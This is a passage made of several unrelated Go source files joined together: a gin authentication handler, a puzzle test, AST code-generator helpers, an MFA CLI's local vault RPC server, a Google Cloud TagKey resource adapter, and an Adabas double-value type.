	return txn.Send(t.Ctx, tx, t.Orderers)
}
|
package handler
import (
"net/http"
"github.com/agusbasari29/Skilltest-RSP-Akselerasi-2-Backend-Agus-Basari/entity"
"github.com/agusbasari29/Skilltest-RSP-Akselerasi-2-Backend-Agus-Basari/helper"
"github.com/agusbasari29/Skilltest-RSP-Akselerasi-2-Backend-Agus-Basari/request"
"github.com/agusbasari29/Skilltest-RSP-Akselerasi-2-Backend-Agus-Basari/response"
"github.com/agusbasari29/Skilltest-RSP-Akselerasi-2-Backend-Agus-Basari/services"
"github.com/gin-gonic/gin"
)
// authHandler serves the authentication endpoints (register, login,
// forget-password) on top of the user and JWT services.
type authHandler struct {
	userServices services.UserServices
	jwtService   services.JWTServices
}

// NewAuthHandler wires an authHandler with its service dependencies.
func NewAuthHandler(userServices services.UserServices, jwtService services.JWTServices) *authHandler {
	return &authHandler{userServices, jwtService}
}
// Register handles user sign-up: it binds and validates the request,
// rejects duplicate usernames with 409, creates the user, and returns
// the new user together with a freshly generated JWT.
func (h *authHandler) Register(c *gin.Context) {
	var req request.RequestAuthRegister
	if errReq := c.ShouldBind(&req); errReq != nil {
		resp := helper.ResponseFormatter(http.StatusBadRequest, "error", "invalid", nil)
		c.AbortWithStatusJSON(http.StatusBadRequest, resp)
		return
	}
	if validationErr := validate.Struct(req); validationErr != nil {
		errorMessage := helper.M{"error": helper.ErrorFormatter(validationErr)}
		resp := helper.ResponseFormatter(http.StatusBadRequest, "error", errorMessage, nil)
		c.AbortWithStatusJSON(http.StatusBadRequest, resp)
		return
	}
	if h.userServices.UserIsExist(req.Username) {
		// Fixed: the body previously reported 400 while the HTTP status
		// actually sent was 409 Conflict; also fixed the "alerady" typo.
		resp := helper.ResponseFormatter(http.StatusConflict, "error", "User is already registered!", nil)
		c.AbortWithStatusJSON(http.StatusConflict, resp)
		return
	}
	newUser, err := h.userServices.CreateUser(req)
	if err != nil {
		errorMessage := helper.M{"error": helper.ErrorFormatter(err)}
		resp := helper.ResponseFormatter(http.StatusBadRequest, "error", errorMessage, nil)
		c.JSON(http.StatusBadRequest, resp)
		return
	}
	generatedToken := h.jwtService.GenerateToken(newUser)
	userData := response.ResponseUserFormatter(newUser)
	data := response.ResponseUserDataFormatter(userData, generatedToken)
	// Local renamed to resp: the original `response :=` shadowed the
	// imported `response` package.
	resp := helper.ResponseFormatter(http.StatusOK, "success", "User successfully registered.", data)
	c.JSON(http.StatusOK, resp)
}
// Login authenticates a user by username/password and, on success,
// returns the user payload together with a fresh JWT.
func (h *authHandler) Login(c *gin.Context) {
	var req request.RequestAuthLogin
	if err := c.ShouldBind(&req); err != nil {
		resp := helper.ResponseFormatter(http.StatusBadRequest, "error", "invalid", nil)
		c.AbortWithStatusJSON(http.StatusBadRequest, resp)
		return
	}
	if validationErr := validate.Struct(req); validationErr != nil {
		errorMessage := helper.M{"error": helper.ErrorFormatter(validationErr)}
		resp := helper.ResponseFormatter(http.StatusBadRequest, "error", errorMessage, nil)
		c.AbortWithStatusJSON(http.StatusBadRequest, resp)
		return
	}
	credential := h.userServices.VerifyCredential(req.Username, req.Password)
	if v, ok := credential.(entity.Users); ok {
		generatedToken := h.jwtService.GenerateToken(v)
		userData := response.ResponseUserFormatter(v)
		data := response.ResponseUserDataFormatter(userData, generatedToken)
		// Fixed: the success message said "registered" — a copy/paste
		// from Register; this endpoint logs the user in.
		resp := helper.ResponseFormatter(http.StatusOK, "success", "User successfully logged in.", data)
		c.JSON(http.StatusOK, resp)
		return
	}
	resp := helper.ResponseFormatter(http.StatusUnauthorized, "error", "Cannot log in!", nil)
	c.AbortWithStatusJSON(http.StatusUnauthorized, resp)
}
// ForgetPassword validates a password-reset request and verifies the
// supplied email belongs to a registered user.
//
// NOTE(review): when the email IS registered the handler falls through
// without writing any response or triggering a reset — confirm whether
// the reset-mail step is implemented elsewhere or still missing.
func (h *authHandler) ForgetPassword(c *gin.Context) {
	var req request.RequestAuthForgetPassword
	err := c.ShouldBind(&req)
	if err != nil {
		response := helper.ResponseFormatter(http.StatusBadRequest, "error", "invalid", nil)
		c.AbortWithStatusJSON(http.StatusBadRequest, response)
		return
	}
	validationErr := validate.Struct(req)
	if validationErr != nil {
		errorFormatter := helper.ErrorFormatter(validationErr)
		errorMessage := helper.M{"error": errorFormatter}
		response := helper.ResponseFormatter(http.StatusBadRequest, "error", errorMessage, nil)
		c.AbortWithStatusJSON(http.StatusBadRequest, response)
		return
	}
	// Reject the request when no account uses this email address.
	EmailIsExist := h.userServices.EmailIsExist(req)
	if !EmailIsExist {
		response := helper.ResponseFormatter(http.StatusBadRequest, "error", "User with this email is not registered.", nil)
		c.AbortWithStatusJSON(http.StatusBadRequest, response)
		return
	}
}
|
package shortestCompletingWord
import (
"testing"
"fmt"
)
// TestShortest exercises shortestCompletingWord against licence plates
// with known expected completions.
func TestShortest(t *testing.T) {
	cases := []struct {
		plate  string
		words  []string
		output string
	}{
		{"1s3 PSt", []string{"step", "steps", "stripe", "stepple"}, "steps"},
		{"1s3 456", []string{"looks", "pest", "stew", "show"}, "pest"},
		{"Ah71752", []string{"suggest", "letter", "of", "husband", "easy", "education", "drug", "prevent", "writer", "old"}, "husband"},
	}
	for _, tc := range cases {
		t.Run("completion", func(t *testing.T) {
			got := shortestCompletingWord(tc.plate, tc.words)
			fmt.Println(got)
			if got != tc.output {
				t.Errorf("fail %s", tc.plate)
			}
		})
	}
}
|
package generator
import (
"bytes"
"fmt"
"go/ast"
"strconv"
"strings"
"time"
"unicode"
"unicode/utf8"
)
// formatComment turns a raw multi-line comment body into Go line
// comments, prefixing every line with "// ". A trailing newline in the
// input (which Split turns into a final empty element) is dropped; an
// empty input yields an empty string.
func formatComment(comment string) string {
	if comment == "" {
		return ""
	}
	out := bytes.NewBuffer(nil)
	parts := strings.Split(comment, "\n")
	last := len(parts) - 1
	for idx, line := range parts {
		// Skip the empty artifact produced by a trailing newline.
		if idx == last && line == "" {
			continue
		}
		if idx > 0 {
			out.WriteByte('\n')
		}
		out.WriteString("// ")
		out.WriteString(line)
	}
	return out.String()
}
// findStructTypeParamsAndFields locates the struct type named typeName
// anywhere in packages and returns its type parameters and fields
// (either may be nil). Both results are nil when no such struct exists.
func findStructTypeParamsAndFields(packages map[string]*ast.Package, typeName string) ([]*ast.Field, []*ast.Field) {
	for _, decl := range getDecls(packages) {
		genDecl, ok := decl.(*ast.GenDecl)
		if !ok {
			continue
		}
		for _, spec := range genDecl.Specs {
			ts, ok := spec.(*ast.TypeSpec)
			if !ok || ts.Name.Name != typeName {
				continue
			}
			structType, ok := ts.Type.(*ast.StructType)
			if !ok {
				// Right name but not a struct; keep searching.
				continue
			}
			return extractFields(ts.TypeParams), extractFields(structType.Fields)
		}
	}
	return nil, nil
}
func getDecls(packages map[string]*ast.Package) []ast.Decl {
var res []ast.Decl
for _, pkg := range packages {
for _, fileObj := range pkg.Files {
res = append(res, fileObj.Decls...)
}
}
return res
}
func extractFields(fl *ast.FieldList) []*ast.Field {
if fl == nil {
return nil
}
return fl.List
}
// isPublic reports whether fieldName starts with an upper-case rune,
// i.e. whether the identifier is exported. Invalid UTF-8 and the
// empty string are treated as not public.
func isPublic(fieldName string) bool {
	first, _ := utf8.DecodeRuneInString(fieldName)
	if first == utf8.RuneError {
		return false
	}
	return unicode.IsUpper(first)
}
// checkDefaultValue verifies that tag is a parseable default value for
// the given field type. Supported types are the integer families,
// floats, time.Duration, bool (literal true/false) and string (always
// valid). It returns an error for unparseable values or unknown types.
func checkDefaultValue(fieldType string, tag string) error {
	var parseErr error
	switch fieldType {
	case "int", "int8", "int16", "int32", "int64":
		_, parseErr = strconv.ParseInt(tag, 10, 64)
	case "uint", "uint8", "uint16", "uint32", "uint64":
		_, parseErr = strconv.ParseUint(tag, 10, 64)
	case "float32", "float64":
		_, parseErr = strconv.ParseFloat(tag, 64)
	case "time.Duration":
		_, parseErr = time.ParseDuration(tag)
	case "bool":
		if tag != "true" && tag != "false" {
			return fmt.Errorf("bool type only supports true/false")
		}
	case "string":
		// Any string is a valid default.
	default:
		return fmt.Errorf("unsupported type `%s`", fieldType)
	}
	if parseErr != nil {
		return fmt.Errorf("bad default value %w %s", parseErr, tag)
	}
	return nil
}
|
package vault
import (
"io/ioutil"
"net"
"net/rpc"
"os"
"os/signal"
"syscall"
"time"
log "github.com/sirupsen/logrus"
"github.com/nordcloud/mfacli/config"
"github.com/nordcloud/mfacli/pkg/codec"
)
const (
	// serverName is the RPC service name the vault server is exposed under.
	serverName = "VaultServer"
)
// VaultServer exposes a local vault over net/rpc; it also holds the
// listener so the Stop RPC can shut the server down.
type VaultServer struct {
	vault *localVault
	lis   net.Listener
}
// GetSecrets is the RPC method returning all decrypted secrets.
// The input struct is unused (net/rpc requires two arguments).
func (s *VaultServer) GetSecrets(input struct{}, secrets *map[string]string) error {
	*secrets = s.vault.secrets
	return nil
}
// StoreSecrets is the RPC method replacing the secret map and
// persisting it to disk via the vault's save routine.
func (s *VaultServer) StoreSecrets(secrets map[string]string, output *struct{}) error {
	s.vault.secrets = secrets
	return s.vault.save()
}
// Stop is the RPC method that shuts the server down by closing its
// listener, which unblocks rpc.Accept in RunServer. The Close error
// is intentionally discarded — there is nothing useful to do with it.
func (s *VaultServer) Stop(input struct{}, output *struct{}) error {
	s.lis.Close()
	return nil
}
// RunServer reads the encryption key from stdin, opens the vault at
// cfg.VaultPath, and serves it over a unix-domain RPC socket until the
// listener is closed (Stop RPC, signal, or the 8-hour timeout).
func RunServer(cfg *config.Config) error {
	// The key arrives on stdin so it never appears on a command line.
	key, err := ioutil.ReadAll(os.Stdin)
	if err != nil {
		return err
	}
	vault, err := openLocalWithKey(cfg.VaultPath, key)
	if err != nil {
		return err
	}
	lis, err := net.Listen("unix", cfg.SocketPath)
	if err != nil {
		return err
	}
	defer lis.Close()
	go handleSignals(lis)
	err = rpc.Register(&VaultServer{
		lis:   lis,
		vault: vault,
	})
	if err != nil {
		return err
	}
	// Safety valve: never keep decrypted secrets in memory forever.
	go func() {
		time.Sleep(8 * time.Hour)
		log.Info("closing listener after timeout")
		lis.Close()
	}()
	// Accept blocks until the listener is closed by any of the above.
	rpc.Accept(lis)
	return nil
}
// openLocalWithKey reads and decrypts the vault file at path using key
// and returns an in-memory vault bound to that path and key.
func openLocalWithKey(path string, key []byte) (*localVault, error) {
	// Fixed: the original os.Open + ReadAll never closed the file,
	// leaking a descriptor; ReadFile opens, reads, and closes.
	data, err := ioutil.ReadFile(path)
	if err != nil {
		return nil, err
	}
	secrets, err := codec.Decrypt(data, key)
	if err != nil {
		return nil, err
	}
	return &localVault{
		secrets: secrets,
		encKey:  key,
		path:    path,
	}, nil
}
// handleSignals closes the RPC listener and exits the process when
// SIGINT or SIGTERM arrives, so the unix socket is torn down cleanly.
func handleSignals(lis net.Listener) {
	// Fixed: signal.Notify requires a buffered channel — it does not
	// block when delivering, so an unbuffered channel can drop the
	// signal (this is also flagged by go vet).
	c := make(chan os.Signal, 1)
	signal.Notify(c, os.Interrupt, syscall.SIGTERM)
	s := <-c
	log.Infof("Caught the %s signal, closing server", s.String())
	lis.Close()
	os.Exit(0)
}
|
// Copyright 2023 Google LLC. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package cloudresourcemanager
import (
"context"
"fmt"
"github.com/GoogleCloudPlatform/declarative-resource-client-library/dcl"
dclService "github.com/GoogleCloudPlatform/declarative-resource-client-library/services/google/cloudresourcemanager"
"github.com/GoogleCloudPlatform/declarative-resource-client-library/services/google/iam"
"github.com/GoogleCloudPlatform/declarative-resource-client-library/unstructured"
iamUnstruct "github.com/GoogleCloudPlatform/declarative-resource-client-library/unstructured/google/iam"
)
// TagKey adapts the cloudresourcemanager TagKey resource to the
// unstructured.Resource interface (generated-style adapter).
type TagKey struct{}

// TagKeyToUnstructured converts a typed TagKey into its unstructured
// map form; only non-nil fields are emitted.
func TagKeyToUnstructured(r *dclService.TagKey) *unstructured.Resource {
	u := &unstructured.Resource{
		STV: unstructured.ServiceTypeVersion{
			Service: "cloudresourcemanager",
			Version: "ga",
			Type:    "TagKey",
		},
		Object: make(map[string]interface{}),
	}
	if r.CreateTime != nil {
		u.Object["createTime"] = *r.CreateTime
	}
	if r.Description != nil {
		u.Object["description"] = *r.Description
	}
	if r.Etag != nil {
		u.Object["etag"] = *r.Etag
	}
	if r.Name != nil {
		u.Object["name"] = *r.Name
	}
	if r.NamespacedName != nil {
		u.Object["namespacedName"] = *r.NamespacedName
	}
	if r.Parent != nil {
		u.Object["parent"] = *r.Parent
	}
	if r.Purpose != nil {
		u.Object["purpose"] = string(*r.Purpose)
	}
	if r.PurposeData != nil {
		// Copy the map so the unstructured object does not alias r.
		rPurposeData := make(map[string]interface{})
		for k, v := range r.PurposeData {
			rPurposeData[k] = v
		}
		u.Object["purposeData"] = rPurposeData
	}
	if r.ShortName != nil {
		u.Object["shortName"] = *r.ShortName
	}
	if r.UpdateTime != nil {
		u.Object["updateTime"] = *r.UpdateTime
	}
	return u
}
// UnstructuredToTagKey converts an unstructured resource back into a
// typed TagKey, validating that every present field has the expected
// string (or string-map) shape.
func UnstructuredToTagKey(u *unstructured.Resource) (*dclService.TagKey, error) {
	r := &dclService.TagKey{}
	if _, ok := u.Object["createTime"]; ok {
		if s, ok := u.Object["createTime"].(string); ok {
			r.CreateTime = dcl.String(s)
		} else {
			return nil, fmt.Errorf("r.CreateTime: expected string")
		}
	}
	if _, ok := u.Object["description"]; ok {
		if s, ok := u.Object["description"].(string); ok {
			r.Description = dcl.String(s)
		} else {
			return nil, fmt.Errorf("r.Description: expected string")
		}
	}
	if _, ok := u.Object["etag"]; ok {
		if s, ok := u.Object["etag"].(string); ok {
			r.Etag = dcl.String(s)
		} else {
			return nil, fmt.Errorf("r.Etag: expected string")
		}
	}
	if _, ok := u.Object["name"]; ok {
		if s, ok := u.Object["name"].(string); ok {
			r.Name = dcl.String(s)
		} else {
			return nil, fmt.Errorf("r.Name: expected string")
		}
	}
	if _, ok := u.Object["namespacedName"]; ok {
		if s, ok := u.Object["namespacedName"].(string); ok {
			r.NamespacedName = dcl.String(s)
		} else {
			return nil, fmt.Errorf("r.NamespacedName: expected string")
		}
	}
	if _, ok := u.Object["parent"]; ok {
		if s, ok := u.Object["parent"].(string); ok {
			r.Parent = dcl.String(s)
		} else {
			return nil, fmt.Errorf("r.Parent: expected string")
		}
	}
	if _, ok := u.Object["purpose"]; ok {
		if s, ok := u.Object["purpose"].(string); ok {
			r.Purpose = dclService.TagKeyPurposeEnumRef(s)
		} else {
			return nil, fmt.Errorf("r.Purpose: expected string")
		}
	}
	if _, ok := u.Object["purposeData"]; ok {
		if rPurposeData, ok := u.Object["purposeData"].(map[string]interface{}); ok {
			// Non-string values are silently skipped, matching the
			// generator's lenient map handling.
			m := make(map[string]string)
			for k, v := range rPurposeData {
				if s, ok := v.(string); ok {
					m[k] = s
				}
			}
			r.PurposeData = m
		} else {
			return nil, fmt.Errorf("r.PurposeData: expected map[string]interface{}")
		}
	}
	if _, ok := u.Object["shortName"]; ok {
		if s, ok := u.Object["shortName"].(string); ok {
			r.ShortName = dcl.String(s)
		} else {
			return nil, fmt.Errorf("r.ShortName: expected string")
		}
	}
	if _, ok := u.Object["updateTime"]; ok {
		if s, ok := u.Object["updateTime"].(string); ok {
			r.UpdateTime = dcl.String(s)
		} else {
			return nil, fmt.Errorf("r.UpdateTime: expected string")
		}
	}
	return r, nil
}
// GetTagKey fetches the TagKey described by u and returns it in
// unstructured form.
func GetTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource) (*unstructured.Resource, error) {
	c := dclService.NewClient(config)
	r, err := UnstructuredToTagKey(u)
	if err != nil {
		return nil, err
	}
	r, err = c.GetTagKey(ctx, r)
	if err != nil {
		return nil, err
	}
	return TagKeyToUnstructured(r), nil
}

// ApplyTagKey creates or updates the TagKey described by u, honouring
// a state hint from opts when one is present.
func ApplyTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource, opts ...dcl.ApplyOption) (*unstructured.Resource, error) {
	c := dclService.NewClient(config)
	r, err := UnstructuredToTagKey(u)
	if err != nil {
		return nil, err
	}
	if ush := unstructured.FetchStateHint(opts); ush != nil {
		sh, err := UnstructuredToTagKey(ush)
		if err != nil {
			return nil, err
		}
		opts = append(opts, dcl.WithStateHint(sh))
	}
	r, err = c.ApplyTagKey(ctx, r, opts...)
	if err != nil {
		return nil, err
	}
	return TagKeyToUnstructured(r), nil
}

// TagKeyHasDiff reports whether applying u would change anything, by
// running Apply with all lifecycle mutations blocked: an
// ApplyInfeasibleError means a change would be required.
func TagKeyHasDiff(ctx context.Context, config *dcl.Config, u *unstructured.Resource, opts ...dcl.ApplyOption) (bool, error) {
	c := dclService.NewClient(config)
	r, err := UnstructuredToTagKey(u)
	if err != nil {
		return false, err
	}
	if ush := unstructured.FetchStateHint(opts); ush != nil {
		sh, err := UnstructuredToTagKey(ush)
		if err != nil {
			return false, err
		}
		opts = append(opts, dcl.WithStateHint(sh))
	}
	opts = append(opts, dcl.WithLifecycleParam(dcl.BlockDestruction), dcl.WithLifecycleParam(dcl.BlockCreation), dcl.WithLifecycleParam(dcl.BlockModification))
	_, err = c.ApplyTagKey(ctx, r, opts...)
	if err != nil {
		if _, ok := err.(dcl.ApplyInfeasibleError); ok {
			return true, nil
		}
		return false, err
	}
	return false, nil
}

// DeleteTagKey deletes the TagKey described by u.
func DeleteTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource) error {
	c := dclService.NewClient(config)
	r, err := UnstructuredToTagKey(u)
	if err != nil {
		return err
	}
	return c.DeleteTagKey(ctx, r)
}

// TagKeyID returns the canonical identity of the TagKey described by u.
func TagKeyID(u *unstructured.Resource) (string, error) {
	r, err := UnstructuredToTagKey(u)
	if err != nil {
		return "", err
	}
	return r.ID()
}
// STV returns the service/type/version triple under which TagKey is
// registered with the unstructured resource registry.
func (r *TagKey) STV() unstructured.ServiceTypeVersion {
	// Fixed: the original unkeyed composite literal silently depended
	// on the struct's field order (go vet `composites`); keyed fields
	// pin each value to its field and match the triple emitted by
	// TagKeyToUnstructured above.
	return unstructured.ServiceTypeVersion{
		Service: "cloudresourcemanager",
		Type:    "TagKey",
		Version: "ga",
	}
}
// SetPolicyTagKey sets the full IAM policy on the TagKey described by u.
func SetPolicyTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource, p *unstructured.Resource) (*unstructured.Resource, error) {
	r, err := UnstructuredToTagKey(u)
	if err != nil {
		return nil, err
	}
	policy, err := iamUnstruct.UnstructuredToPolicy(p)
	if err != nil {
		return nil, err
	}
	policy.Resource = r
	iamClient := iam.NewClient(config)
	newPolicy, err := iamClient.SetPolicy(ctx, policy)
	if err != nil {
		return nil, err
	}
	return iamUnstruct.PolicyToUnstructured(newPolicy), nil
}

// SetPolicyWithEtagTagKey sets the IAM policy using its etag for
// optimistic concurrency control.
func SetPolicyWithEtagTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource, p *unstructured.Resource) (*unstructured.Resource, error) {
	r, err := UnstructuredToTagKey(u)
	if err != nil {
		return nil, err
	}
	policy, err := iamUnstruct.UnstructuredToPolicy(p)
	if err != nil {
		return nil, err
	}
	policy.Resource = r
	iamClient := iam.NewClient(config)
	newPolicy, err := iamClient.SetPolicyWithEtag(ctx, policy)
	if err != nil {
		return nil, err
	}
	return iamUnstruct.PolicyToUnstructured(newPolicy), nil
}

// GetPolicyTagKey fetches the IAM policy attached to the TagKey.
func GetPolicyTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource) (*unstructured.Resource, error) {
	r, err := UnstructuredToTagKey(u)
	if err != nil {
		return nil, err
	}
	iamClient := iam.NewClient(config)
	policy, err := iamClient.GetPolicy(ctx, r)
	if err != nil {
		return nil, err
	}
	return iamUnstruct.PolicyToUnstructured(policy), nil
}

// SetPolicyMemberTagKey adds or updates a single policy member binding.
func SetPolicyMemberTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource, m *unstructured.Resource) (*unstructured.Resource, error) {
	r, err := UnstructuredToTagKey(u)
	if err != nil {
		return nil, err
	}
	member, err := iamUnstruct.UnstructuredToMember(m)
	if err != nil {
		return nil, err
	}
	member.Resource = r
	iamClient := iam.NewClient(config)
	policy, err := iamClient.SetMember(ctx, member)
	if err != nil {
		return nil, err
	}
	return iamUnstruct.PolicyToUnstructured(policy), nil
}

// GetPolicyMemberTagKey fetches a single role/member binding.
func GetPolicyMemberTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource, role, member string) (*unstructured.Resource, error) {
	r, err := UnstructuredToTagKey(u)
	if err != nil {
		return nil, err
	}
	iamClient := iam.NewClient(config)
	policyMember, err := iamClient.GetMember(ctx, r, role, member)
	if err != nil {
		return nil, err
	}
	return iamUnstruct.MemberToUnstructured(policyMember), nil
}

// DeletePolicyMemberTagKey removes a single policy member binding.
func DeletePolicyMemberTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource, m *unstructured.Resource) error {
	r, err := UnstructuredToTagKey(u)
	if err != nil {
		return err
	}
	member, err := iamUnstruct.UnstructuredToMember(m)
	if err != nil {
		return err
	}
	member.Resource = r
	iamClient := iam.NewClient(config)
	if err := iamClient.DeleteMember(ctx, member); err != nil {
		return err
	}
	return nil
}
// The methods below satisfy the unstructured resource interface by
// delegating to the package-level TagKey functions above.

func (r *TagKey) SetPolicyMember(ctx context.Context, config *dcl.Config, resource *unstructured.Resource, member *unstructured.Resource) (*unstructured.Resource, error) {
	return SetPolicyMemberTagKey(ctx, config, resource, member)
}

func (r *TagKey) GetPolicyMember(ctx context.Context, config *dcl.Config, resource *unstructured.Resource, role, member string) (*unstructured.Resource, error) {
	return GetPolicyMemberTagKey(ctx, config, resource, role, member)
}

func (r *TagKey) DeletePolicyMember(ctx context.Context, config *dcl.Config, resource *unstructured.Resource, member *unstructured.Resource) error {
	return DeletePolicyMemberTagKey(ctx, config, resource, member)
}

func (r *TagKey) SetPolicy(ctx context.Context, config *dcl.Config, resource *unstructured.Resource, policy *unstructured.Resource) (*unstructured.Resource, error) {
	return SetPolicyTagKey(ctx, config, resource, policy)
}

func (r *TagKey) SetPolicyWithEtag(ctx context.Context, config *dcl.Config, resource *unstructured.Resource, policy *unstructured.Resource) (*unstructured.Resource, error) {
	return SetPolicyWithEtagTagKey(ctx, config, resource, policy)
}

func (r *TagKey) GetPolicy(ctx context.Context, config *dcl.Config, resource *unstructured.Resource) (*unstructured.Resource, error) {
	return GetPolicyTagKey(ctx, config, resource)
}

func (r *TagKey) Get(ctx context.Context, config *dcl.Config, resource *unstructured.Resource) (*unstructured.Resource, error) {
	return GetTagKey(ctx, config, resource)
}

func (r *TagKey) Apply(ctx context.Context, config *dcl.Config, resource *unstructured.Resource, opts ...dcl.ApplyOption) (*unstructured.Resource, error) {
	return ApplyTagKey(ctx, config, resource, opts...)
}

func (r *TagKey) HasDiff(ctx context.Context, config *dcl.Config, resource *unstructured.Resource, opts ...dcl.ApplyOption) (bool, error) {
	return TagKeyHasDiff(ctx, config, resource, opts...)
}

func (r *TagKey) Delete(ctx context.Context, config *dcl.Config, resource *unstructured.Resource) error {
	return DeleteTagKey(ctx, config, resource)
}

func (r *TagKey) ID(resource *unstructured.Resource) (string, error) {
	return TagKeyID(resource)
}
// init registers the TagKey adapter with the unstructured resource
// registry at package load time.
func init() {
	unstructured.Register(&TagKey{})
}
|
/*
* Copyright © 2018-2022 Software AG, Darmstadt, Germany and/or its licensors
*
* SPDX-License-Identifier: Apache-2.0
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package adatypes
import (
"bytes"
"encoding/binary"
"fmt"
"math"
"reflect"
"strconv"
)
// doubleValue holds an 8-byte floating-point Adabas field value in the
// byte order produced by endian().
type doubleValue struct {
	adaValue
	value []byte
}

// newDoubleValue creates a doubleValue for the given type definition
// with a zeroed 8-byte backing buffer.
func newDoubleValue(initType IAdaType) *doubleValue {
	value := doubleValue{adaValue: adaValue{adatype: initType}}
	value.value = make([]byte, 8)
	return &value
}
// float64ToByte encodes f into 8 bytes using the byte order returned
// by endian(). A write error is only printed; binary.Write into a
// bytes.Buffer cannot realistically fail for a float64.
func float64ToByte(f float64) []byte {
	buf := new(bytes.Buffer)
	err := binary.Write(buf, endian(), f)
	if err != nil {
		fmt.Println("binary.Write failed:", err)
	}
	return buf.Bytes()
}
// byteToFLoat64 decodes the first 8 bytes of b as a float64 using the
// endian() byte order. Read errors are only printed and yield 0.
// NOTE(review): the "FLoat" capitalisation is a typo, but the name is
// kept since callers elsewhere in the package may use it.
func byteToFLoat64(b []byte) float64 {
	buf := bytes.NewBuffer(b)
	var f float64
	err := binary.Read(buf, endian(), &f)
	if err != nil {
		fmt.Println("binary.Read failed:", err)
	}
	return f
}
// ByteValue returns the first raw byte of the encoded value.
func (value *doubleValue) ByteValue() byte {
	return value.value[0]
}
// String renders the decoded float with %f formatting.
func (value *doubleValue) String() string {
	return fmt.Sprintf("%f", byteToFLoat64(value.value))
}
// Value returns the stored bytes decoded as a float64.
func (value *doubleValue) Value() interface{} {
	return byteToFLoat64(value.value)
}
// Bytes returns the raw 8-byte encoding. The slice is not copied, so
// the caller shares the underlying storage with this value.
func (value *doubleValue) Bytes() []byte {
	return value.value
}
// SetStringValue parses stValue as a 64-bit float and stores its
// binary encoding. Unparsable input leaves the value unchanged — the
// parse error is deliberately discarded because this setter has no
// way to report it.
func (value *doubleValue) SetStringValue(stValue string) {
	if f, err := strconv.ParseFloat(stValue, 64); err == nil {
		value.value = float64ToByte(f)
	}
}
// SetValue stores v as the 8-byte binary encoding of a float64.
// Float kinds are stored directly, strings are parsed, byte slices
// are copied verbatim into the buffer, and every other kind goes
// through the common int64 conversion. Errors arise only from an
// oversized byte slice or a failed integer conversion.
func (value *doubleValue) SetValue(v interface{}) error {
	rv := reflect.ValueOf(v)
	switch rv.Kind() {
	case reflect.Float32, reflect.Float64:
		value.value = float64ToByte(rv.Float())
	case reflect.String:
		// Parse errors are silently dropped by SetStringValue.
		value.SetStringValue(rv.String())
	case reflect.Slice:
		// NOTE(review): this assertion assumes the slice is a plain
		// []byte; any other slice type panics here — confirm callers
		// never pass one.
		bv := v.([]byte)
		if uint32(len(bv)) > value.Type().Length() {
			return NewGenericError(109)
		}
		// A short slice only overwrites its prefix; the remaining
		// bytes of the previous encoding are kept.
		copy(value.value[:len(bv)], bv)
	default:
		i, err := value.commonInt64Convert(v)
		if err != nil {
			return err
		}
		value.value = float64ToByte(float64(i))
	}
	return nil
}
// FormatBuffer appends this field's format-buffer contribution via the
// common helper, using the type's declared length.
func (value *doubleValue) FormatBuffer(buffer *bytes.Buffer, option *BufferOption) uint32 {
	return value.commonFormatBuffer(buffer, option, value.Type().Length())
}
// StoreBuffer writes the raw 8-byte encoding into the record buffer.
func (value *doubleValue) StoreBuffer(helper *BufferHelper, option *BufferOption) error {
	// Skip normal fields in second call
	if option != nil && option.SecondCall > 0 {
		return nil
	}
	return helper.putBytes(value.value)
}
// parseBuffer reads the type's declared number of bytes from the
// record buffer into value.value, replacing the previous slice.
func (value *doubleValue) parseBuffer(helper *BufferHelper, option *BufferOption) (res TraverseResult, err error) {
	value.value, err = helper.ReceiveBytes(value.Type().Length())
	return
}
// Int8 converts the stored float64 into an int8. A value with a
// fractional part cannot be represented and yields a conversion
// error; like the sibling converters, range overflow is not checked.
func (value *doubleValue) Int8() (int8, error) {
	fl := byteToFLoat64(value.value)
	if fl != math.Trunc(fl) {
		// Fixed: the message previously said "signed 32-bit integer",
		// a copy/paste from Int32 — report the actual target type.
		return 0, NewGenericError(105, value.Type().Name(), "signed 8-bit integer")
	}
	return int8(fl), nil
}
// UInt8 converts the stored float64 into a uint8 by truncation.
// Unlike Int8, no fractional-part check is performed.
func (value *doubleValue) UInt8() (uint8, error) {
	return uint8(byteToFLoat64(value.value)), nil
}
// Int16 converts the stored float64 into an int16. A value with a
// fractional part cannot be represented and yields a conversion
// error; like the sibling converters, range overflow is not checked.
func (value *doubleValue) Int16() (int16, error) {
	fl := byteToFLoat64(value.value)
	if fl != math.Trunc(fl) {
		// Fixed: the message previously said "signed 32-bit integer",
		// a copy/paste from Int32 — report the actual target type.
		return 0, NewGenericError(105, value.Type().Name(), "signed 16-bit integer")
	}
	return int16(fl), nil
}
// UInt16 converts the stored float64 into a uint16 by truncation.
// Unlike Int16, no fractional-part check is performed.
func (value *doubleValue) UInt16() (uint16, error) {
	return uint16(byteToFLoat64(value.value)), nil
}
// Int32 converts the stored float64 into an int32. A value with a
// fractional part cannot be represented and yields a conversion error.
func (value *doubleValue) Int32() (int32, error) {
	fl := byteToFLoat64(value.value)
	if fl == math.Trunc(fl) {
		return int32(fl), nil
	}
	return 0, NewGenericError(105, value.Type().Name(), "signed 32-bit integer")
}
// UInt32 converts the stored float64 into a uint32 by truncation.
// Unlike Int32, no fractional-part check is performed.
func (value *doubleValue) UInt32() (uint32, error) {
	return uint32(byteToFLoat64(value.value)), nil
}
// Int64 converts the stored float64 into an int64 by truncation.
